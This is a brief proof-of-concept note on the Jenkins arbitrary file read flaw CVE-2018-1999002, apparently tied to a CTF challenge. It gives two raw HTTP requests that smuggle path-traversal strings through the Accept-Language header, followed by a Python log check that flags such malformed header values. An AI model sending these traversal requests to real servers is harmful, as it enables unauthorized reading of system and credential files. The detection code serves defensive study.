PoC

GET /plugin/credentials/.ini HTTP/1.1
Host:
Accept-Language: ../../../../../../../../windows/win

GET /plugin/credentials/.txt HTTP/1.1
Host:
Accept-Language: ../../../../../../../../firebasky
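
Jenkins arbitrary file read vulnerability: reproduction and analysis (CVE-2018-1999002)
On Linux, exploitation is difficult: you must find a directory whose name contains an underscore (_).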
https://github.com/Firebasky/ctf-Challenge/tree/main/2021_xyb_easyJenkins
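
A log-side check for the request shape shown in the PoC, added here as an example and not part of the original notes: it flags any request whose Accept-Language value is not a well-formed language range, which covers the traversal strings in both requests. The host name, the benign request and the function names are constructed for illustration.

```python
import re

# RFC 4647 language range: "*" or 1-8 letters plus "-"-separated alphanumeric subtags.
LANG_RANGE = re.compile(r"\*|[A-Za-z]{1,8}(?:-[A-Za-z0-9]{1,8})*")
QVALUE = re.compile(r"q=(?:0(?:\.\d{0,3})?|1(?:\.0{0,3})?)")

# Constructed samples: both request shapes from the notes (placeholder host) plus a benign one.
SAMPLES = [
    "GET /plugin/credentials/.ini HTTP/1.1\r\nHost: jenkins.example.invalid\r\n"
    "Accept-Language: ../../../../../../../../windows/win\r\n\r\n",
    "GET /plugin/credentials/.txt HTTP/1.1\r\nHost: jenkins.example.invalid\r\n"
    "Accept-Language: ../../../../../../../../firebasky\r\n\r\n",
    "GET /login HTTP/1.1\r\nHost: jenkins.example.invalid\r\n"
    "Accept-Language: en-US,en;q=0.8,zh-CN;q=0.6\r\n\r\n",
]

def parse_request(raw):
    """Return (request target, {lower-cased header name: value}) for a raw request."""
    lines = raw.replace("\r\n", "\n").split("\n")
    parts = lines[0].split(" ")
    target = parts[1] if len(parts) >= 2 else ""
    headers = {}
    for line in lines[1:]:
        if not line:  # blank line ends the header block
            break
        name, sep, value = line.partition(":")
        if sep:
            headers[name.strip().lower()] = value.strip()
    return target, headers

def invalid_language_ranges(value):
    """Return the Accept-Language entries that are not well-formed language ranges."""
    bad = []
    for entry in (e.strip() for e in value.split(",") if e.strip()):
        tag, _, param = entry.partition(";")
        if not LANG_RANGE.fullmatch(tag.strip()) or (
                param.strip() and not QVALUE.fullmatch(param.strip().lower())):
            bad.append(entry)
    return bad

def flag_request(raw):
    """Summarise one request; 'suspicious' is True when any range is malformed."""
    target, headers = parse_request(raw)
    bad = invalid_language_ranges(headers.get("accept-language", ""))
    return {"target": target, "bad_ranges": bad, "suspicious": bool(bad)}

if __name__ == "__main__":
    for sample in SAMPLES:
        print(flag_request(sample))
```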